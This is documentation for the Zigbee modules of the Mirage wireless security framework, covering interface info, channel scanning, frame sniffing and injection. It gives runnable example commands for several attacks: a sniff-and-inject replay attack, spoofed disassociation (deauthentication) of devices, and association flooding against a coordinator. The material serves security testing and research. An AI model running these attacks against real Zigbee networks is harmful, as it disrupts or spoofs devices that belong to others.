List of Zigbee Modules

zigbee_info

Presentation

zigbee_info gets informations on a given Zigbee interface. It can also show the different capabilities of the interface (SHOW_CAPABILITIES parameter).

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rzusbstick0

rzusbstickX|<filename>.pcap

Interface to analyse

SHOW_CAPABILITIES

yes

yes|no

Indicates if the capabilities of the interface should be displayed

Output parameters

  • If the interface provided is rzusbstickX:

Name

Possible values

Description

INTERFACE

rzusbstickX

Selected interface

MODE

NORMAL | JAMMING

Mode currently in use in the selected interface

SERIAL

<hexadecimal>

Device’s serial number

FIRMWARE_VERSION

<string>

Device’s firmware version

INDEX

#X

Device’s index number

  • If the interface provided is <filename>.pcap:

Name

Possible values

Description

INTERFACE

<filename>.pcap

Selected interface

MODE

read | write

Mode in use

Usage

To get complete information about an interface, use the following command:

$ mirage zigbee_info
[INFO] Module zigbee_info loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
┌─────────────┬──────────────┬───────────────┬──────────────────┬────────┐
│ Interface   │ Device Index │ Serial number │ Firmware Version │ Mode   │
├─────────────┼──────────────┼───────────────┼──────────────────┼────────┤
│ rzusbstick0 │ #0           │ FFFFFFFFFFFF  │ KILLERB001       │ NORMAL │
└─────────────┴──────────────┴───────────────┴──────────────────┴────────┘
[INFO] Mirage process terminated !

zigbee_scan

Presentation

zigbee_scan scans the different zigbee channels to discover devices and PanIDs. It allows to configure the execution time (TIME parameter) along with the channels to scan (START_CHANNEL and END_CHANNEL parameters), and to select active or passive scanning (ACTIVE parameter).

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rzusbstick0

rzusbstickX

Interface to use

START_CHANNEL

11

<integer>

First targeted channel

END_CHANNEL

26

<integer>

Last targeted channel

TIME

10

<integer>

Execution time

ACTIVE

yes

<boolean>

Use active scanning

Output parameters

  • If no networks and no devices have been identified, then this module generates no output parameters.

  • If only one device is detected, the following output is produced:

Name

Possible values

Description

TARGET

<ZigBee address>

device’s address (if only one device detected)

TARGET_PANID

<hexadecimal, 2 bytes>

device’s panId (if only one device detected)

CHANNEL

<channel number>

device’s channel (if only one device detected)

  • If multiple networks and multiple devices are detected, the same output parameters are generated, but are suffixed by the number of the device :

Name

Possible values

Description

NETWORK_PANID1

<hexadecimal, 2 bytes>

1st detected network’s panID

NETWORK_CHANNEL1

<integer>

1st detected network’s channel

NETWORK_ASSOC_PERMIT1

<boolean>

1st detected network’s association acceptance

NETWORK_COORDINATOR1

<ZigBee address>

1st detected network’s coordinator

DEVICE_ADDR1

<ZigBee address>

1st detected device’s address

DEVICE_ROLE1

coordinator|end device|router

1st detected device’s role

DEVICE_CHANNEL1

<integer>

1st detected device’s channel

DEVICE_PANID1

<hexadecimal, 2 bytes>

1st detected device’s panID

NETWORK_PANID2

<hexadecimal, 2 bytes>

2nd detected network’s panID

NETWORK_CHANNEL2

<integer>

2nd detected network’s channel

NETWORK_ASSOC_PERMIT2

<boolean>

2nd detected network’s association acceptance

NETWORK_COORDINATOR2

<ZigBee address>

2nd detected network’s coordinator

DEVICE_ADDR2

<ZigBee address>

2nd detected device’s address

DEVICE_ROLE2

coordinator|end device|router

2nd detected device’s role

DEVICE_CHANNEL2

<integer>

2nd detected device’s channel

DEVICE_PANID2

<hexadecimal, 2 bytes>

2nd detected device’s panID

Usage

If you want to perform a passive scan, type the following command:

$ mirage zigbee_scan INTERFACE=rzusbstick0 TIME=20 ACTIVE=no
[INFO] Module zigbee_scan loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
┌────────┬─────────┬───────────────────────┬─────────────────┐
│ Pan ID │ Channel │ Association permitted │ Nodes           │
├────────┼─────────┼───────────────────────┼─────────────────┤
│ 0x3332 │ 12      │ unknown               │ 0x0000(unknown) │
└────────┴─────────┴───────────────────────┴─────────────────┘
[INFO] Mirage process terminated !

If you want to perform an active scan, type the following command:

$ sudo mirage zigbee_scan INTERFACE=rzusbstick0 TIME=20 ACTIVE=yes
[INFO] Module zigbee_scan loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
┌────────┬─────────┬───────────────────────┬─────────────────────┐
│ Pan ID │ Channel │ Association permitted │ Nodes               │
├────────┼─────────┼───────────────────────┼─────────────────────┤
│ 0x3332 │ 12      │ no                    │ 0x0000(coordinator) │
└────────┴─────────┴───────────────────────┴─────────────────────┘
[INFO] Mirage process terminated !

zigbee_inject

Presentation

zigbee_inject allows to inject Zigbee frames. It allows to configure the target by channel, PanID and address (respectively the CHANNEL, TARGET_PANID and TARGET parameters), along with the execution time (TIME parameter) and the PCAP (PCAP_FILE parameter) from which to take the capture.

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rzusbstick0

rzusbstickX

Interface to use

TARGET_PANID

<hexadecimal, 2 bytes>

Targeted PanID

CHANNEL

13

<integer>

Targeted channel

TARGET

<ZigBee address>

Targeted device

TIME

20

<integer>

Execution time

PCAP_FILE

<file path>

Capture file

Output parameters

This module doesn’t provide any output parameters.

Usage

Basic Usage

To inject a packet stream from a file, for example /tmp/capture.pcap, type the following command:

$ mirage zigbee_inject CHANNEL=12 TARGET_PANID=0x3332 PCAP_FILE=/tmp/capture.pcap
[INFO] Module zigbee_inject loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
^C[INFO] Mirage process terminated !

Performing a replay attack

You can also easily perform a replay attack by combining this module with zigbee_sniff :

$ mirage "zigbee_sniff|zigbee_inject" zigbee_sniff1.CHANNEL1=12 zigbee_sniff1.TARGET_PANID=0x3332 zigbee_sniff1.PCAP_FILE=/tmp/zigbeereplay.pcap zigbee_sniff1.TIME=5
[INFO] Module zigbee_sniff loaded !
[INFO] Module zigbee_inject loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[...]

zigbee_sniff

Presentation

zigbee_sniff allows to passively sniffs ZigBee frames. It allows to configure the target by channel, PanID and address (respectively the CHANNEL, TARGET_PANID and TARGET parameters), along with the execution time (TIME parameter) and the optional PCAP file (PCAP_FILE parameter) in which the capture will be saved.

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rzusbstick0

rzusbstickX

Interface to use

TARGET_PANID

<hexadecimal, 2 bytes>

Targeted PanID

CHANNEL

13

<integer>

Targeted channel

TARGET

<ZigBee address>

Targeted device

TIME

20

<integer>

Execution time

PCAP_FILE

<file path>

Capture file

Output parameters

Name

Possible values

Description

INTERFACE

rzusbstickX

Interface used

CHANNEL

<integer>

Channel used

PCAP_FILE

<file path>

Capture file

Usage

Basic Usage

To sniff on a given channel and PanID, type the following command:

$ mirage zigbee_sniff CHANNEL=12 TARGET_PANID=0x3332
[INFO] Module zigbee_sniff loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
^C[INFO] Mirage process terminated !

If you want to export the collected data to a PCAP file, uses the following command:

$ mirage zigbee_sniff CHANNEL=12 TARGET_PANID=0x3332 PCAP_FILE=/tmp/capture.pcap
[INFO] Module zigbee_sniff loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
^C[INFO] Mirage process terminated !

Performing a replay attack

You can also easily perform a replay attack by combining this module with zigbee_inject :

$ mirage "zigbee_sniff|zigbee_inject" zigbee_sniff1.CHANNEL1=12 zigbee_sniff1.TARGET_PANID=0x3332 zigbee_sniff1.PCAP_FILE=/tmp/zigbeereplay.pcap zigbee_sniff1.TIME=5
[INFO] Module zigbee_sniff loaded !
[INFO] Module zigbee_inject loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[...]

zigbee_deauth

Presentation

zigbee_deauth deauthenticates zigbee devices by sending repeatedly Disassociation Notifications. It allows to configure the targeted PanID (TARGET_PANID parameter), channel (CHANNEL parameter), the target device (TARGET parameter), the source address of the frames (SOURCE parameter) and the reason to put in the Disassociation Notifications (REASON parameter).

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rzusbstick0

rzusbstickX

Interface to use

TARGET_PANID

0x1234

<hexadecimal, 2 bytes>

Targeted PanID

CHANNEL

13

<integer>

Targeted channel

TARGET

<ZigBee device address>

Targeted device

SOURCE

<ZigBee device address>

Source address to use

REASON

1

<integer>

Disassociation reason ID

Output parameters

This module doesn’t provide any output parameters.

Usage

You can use this module to send packets to an end device by typing the following command:

$ mirage zigbee_deauth CHANNEL=12 TARGET_PANID=0x3332 TARGET=0x13A200403D57B7 SOURCE=0x13A200405DBCFB
[INFO] Module zigbee_deauth loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[INFO] PanID selected: 0x3332
[INFO] Target selected: 00:13:A2:00:40:3D:57:B7
[INFO] Source selected: 00:13:A2:00:40:5D:BC:FB
^C[INFO] Mirage process terminated !

By reversing the source and the target, you can also send packets to a coordingator with this command:

$ mirage zigbee_deauth CHANNEL=12 TARGET_PANID=0x3332 SOURCE=0x13A200403D57B7 TARGET=0x13A200405DBCFB
[INFO] Module zigbee_deauth loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[INFO] PanID selected: 0x3332
[INFO] Target selected: 00:13:A2:00:40:5D:BC:FB
[INFO] Source selected: 00:13:A2:00:40:3D:57:B7
^C[INFO] Mirage process terminated !

zigbee_floodassoc

Presentation

zigbee_floodassoc performs an association flooding attack. It allows to configure the targeted PanID (TARGET_PANID parameter), the targeted channel (CHANNEL parameter) and the targeted device (TARGET parameter).

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

rzusbstick0

rzusbstickX

Interface to use

TARGET_PANID

0x1234

<hexadecimal, 2 bytes>

Targeted PanID

CHANNEL

13

<channel number>

Targeted channel

TARGET

<ZigBee address>

Targeted device

Output parameters

This module doesn’t provide any output parameters.

Usage

To perform an Association Flooding Attack, type the following command:

$ mirage zigbee_floodassoc CHANNEL=12 TARGET_PANID=0x3332 TARGET=0x13A200405DBCFB
[INFO] Module zigbee_floodassoc loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[INFO] PanID selected: 0x3332
[INFO] Coordinator selected: 00:13:A2:00:40:5D:BC:FB
[INFO] New address: 0xC854
[INFO] New address: 0xDCA1
[INFO] New address: 0xAB88
[INFO] New address: 0xFF61
[INFO] New address: 0x03F0
[INFO] New address: 0x0069
[INFO] New address: 0xB07E
[INFO] New address: 0x2004
^C[INFO] Mirage process terminated !